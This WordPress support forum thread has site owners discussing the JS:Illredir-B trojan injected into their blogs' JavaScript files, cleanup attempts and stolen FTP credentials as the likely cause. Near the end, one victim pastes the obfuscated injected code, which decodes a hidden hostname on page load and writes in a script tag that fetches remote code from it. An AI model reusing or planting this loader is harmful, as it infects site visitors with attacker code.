Support » Fixing WordPress » JS:Illredir-B [Trj] Trojan — Posts and edits infected

  • colvin


    A new malware has been creating huge problems for many WP bloggers over the past week. Avast anti-virus is detecting a Trojan when I and others attempt to create a new post or page, or even to edit a post or page. Avast identifies the culprit as JS:Illredir-B [Trj]. Does anyone know how to get rid of this — it seems to be imbedded within the WP code. I cannot post anything now.

    The malware has also created problems in other areas of WordPress, including a number of plug-ins that utilize java script, as well as the entire wp-includes/js folder. These latter problems in some cases corrupt the blog, with error messages coming up, rather than the blog itself. I’ve managed, with the help of Hostgator and my server admin, to resolve these problems via cPanel, deleting everything that Avast identifies. My blog is once again visible, but I cannot post to it.

    The culprit behind these problems appears to be a malware siszyd32.exe, which is secretly downloaded onto computers that visit infected blogs. Once in one’s computer, it then seeks out one’s blogs and inserts bad things there.

Viewing 14 replies - 1 through 14 (of 14 total)
  • layabozi


    I got this virus on my website. i had many problems, and last week i’ve been down, trying to learn how to do the cleaning and fix all the mess.
    yesterday i found this forum where they talked about the virus (here: ) and they mentioned there a solution. an script to download an install on the server.
    i tried to get it but i couldn’t. i posted asking options of urls, or other ways to get rid of it.
    i’m too scared to reinstall everything. so what i’m doing is downloading folder by folder in my root directory. when downloading my antivirus (avast, al my life!) pops when detecting an infected file (so i take note of the file then).
    As they say on this forum, the virus attacked almost all.js files. So I’m thinking once i finish the cleaning (checking the files during the download, then scanning again those downloaded, then delete the infected files on the server, then do all over again, until there are no more pop ups) …once finished that i will re install wordpress, and the plugins, the files that were infected. and i’l try to keep those that are fine. because most of my plugins are specially custumized for my website, so it is a big big terrible work to reinstall everything from zero.
    also.. i’m hoping only the wordpress folder is infected, because my server provider said that if the other folders in the root directory, set there by the provider, if those are infected then it will be necessary to reset the whole server. i’m crossing fingers, lightning candles, doing spells, praying to all gods, … i don’t even want to write it…. the cleaning has to work out fine and be enough…

    have you find solutions more professionals and effectives?



    My blog administrator and I worked all yesterday cleaning out WP on my server. We had to delete a lot of plug-ins and the entire /js folder. Then I upgraded automatically from WP 2.7 to WP 2.9.1. Avast seemed satisfied, and the blog appeared on screen as it should [missing a couple of plug-ins].

    BUT we have not yet found a way to repair the WP posting facility. Any time I try to post something, Avast identifies this Trojan.

    Hostgator has been helpful, but the malware seems to be widespread there. And presumably it will not repair individual installations of WP.

    Hope to get a final solution today.



    Re-alerting community to new virus attacking WP.



    in this website they are talking about it. and they link to a script that cleans the files.

    i am just too afraid to execute this script wihtout any knowledge. i’m not a pro, as i said, and there are no clear instructions. anyone here who could help me with instructions for dummies to do this??



    The moderator of this WP Forum said that he has referred this problem to the WP Security Team. Hopefully, we will hear an official opinion and fix from them. They will probably reply to this thread — so keep checking it.



    The malware has gotten into my WP-admin post functions. Avast suggest that any new posts will carry the virus and potentially infect my readers.

    A work-around is to do my posts using the ScribeFire extension for Firefox.



    Colvin I understood how to use the script they give in to clean the virus. just upoad it to your rood directory, or public_html folder. then go to and go for it
    there are the instructions.
    it worked! cleaned everything. the website is safe. also i followed the instructions on the other forum i mentioned before. change the password for ftp, and i’m not keeping stored on filezilla.
    use the script, it will take the virus out.

    good luck!



    I am writing this to add to the information pool. 3 Jan 10, I upgraded my WP to 2.9, tried to make a post but couldn’t. When I rebooted my computer WP seemed to work fine.

    (At sometime during this timeline I also upgraded to WP 2.9.1.)

    4 Jan 10 I published a post. 5 Jan 10 I tweeted my post and was notified by one of my twitter friends as follows:

    Avast ( anti-virus software) tells me your page contains a Trojan Horse – JS:Illredir-B [Trj] – check for malicious code injected by hacker

    I found the page:

    used the script and cleaned my Public html directory of the code.

    And in addition I have been using Filezilla for my ftp. I have changed my password and no longer use the quick connect feature.

    At this point I am more curious about how I can protect my site from invasions like this in the future.

    How is it that people seem to think that the ftp is the way this is spread? Any other hints at securing my blog site?



    Clayton James


    How is it that people seem to think that the ftp is the way this is spread?

    I read a little bit about this issue a few days ago. It was my impression that the most likely cause of infection might be that a trojan may actually start its cycle on an infected computer where the ftp client resides. That trojan then attempts to harvest your ftp credentials from your infected pc. If successful, it’s only logical to conclude that your password information for your ftp account is then used to gain access to your web site and compromise your files. I would imagine that once someone with compromised credentials has infected their own site in a shared hosting environment, that it would be reasonable to expect that a trojan/malicious script might be capable of looking for ways to exploit vulnerabilities on a shared server once it’s there. That’s just my impression from what I have read, but it seems to make sense.

    At this point I am more curious about how I can protect my site from invasions like this in the future.

    You might find some helpful tips in the links in these articles.

    FAQ My site was hacked

    Hardening WordPress



    I’m fairly certain that Clayton is correct. My computer was first infected with siszyd32.exe, which somehow got into my computer [probably a “drive-by virus” picked up from a WP blog. I learned about the infection right away, I think, because WinPatrol reported this malware was trying to get into my start up folder.

    WinPatrol won’t clean out this infection. Fastfixer also can detect it –and it claims to completely delete it. I’m not sure that it does a complete removal. I ended up reformatting.

    Thanks re more info regarding the script that will clean the WP installation. I’ll work with my site admin to see how that works.



    Thanks. I appreciate your time and effort. Janine


    After getting Illredir-B, C and E version, I got yesterday (or this morning) a new version without GNU GPL in comment (so fixing scripts will not works). I’m really bored with these trojan, I would want to do something else than fixing my site.

    Is there anything to do ? Is there a WP correction/plugin to avoid these injections ? I read the thread but I didn’t seen talking about patch ?

    Below the new code (I removed voluntarily <script> tags) injected :

    try{window.onload=function(){document.write(‘<div id=megaid></div>’);Ii0eyw8oi3 = document.getElementById(‘megaid’).innerHTML + ‘.(c^&o!@!u^!#n!@#t^e$(r!b^#(e!#&s@(t).@$$r(@u#@!:!&D#$^@E$^)^B)!U@G#(@/($@w)#(i!&k^t&^i@#)#@o#((n^&a)#@r#((&y&#.@&$^o)r@g#&@/&@^w@^!(#i&k$()t@&i(^$o&n)#$$a@#(&r!!y&$&).##^^o!!@#r)g()))/@&@s($$#w!e!&@e(!t!$i((m@).!&(c!@o&)^!m^#/&^$!)n(()h(l&.@$(c^@^o(@m@@/@)#@g$)$^o$(o(^@g)l$(e)!)#@.)c(!&o!(m@)&/(@)()’.replace(/\(|#|\^|\)|\!|&|\$|@/ig, ”) ;document.write(‘<scr’+’ipt src=http://’+Ii0eyw8oi3.replace(/DEBUG/g, ‘8080’)+’></scr’+’ipt>’);} } catch(Bthunpx ) {}

    Thanks in advance for help.
    Best regards, Leparachute.

    Is there anything new on this – I just found out that I have the virus. Not sure where to start or how to upload WP 2.9.1 I haven’t updated my word press since I started.

    you folks have to completely clean your blog and computer

    How To Completely Clean Your Hacked WordPress Installation

    How to find a backdoor in a hacked WordPress


    you can download 2.9.1 by clicking the “Download” link at top right of this page

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘JS:Illredir-B [Trj] Trojan — Posts and edits infected’ is closed to new replies.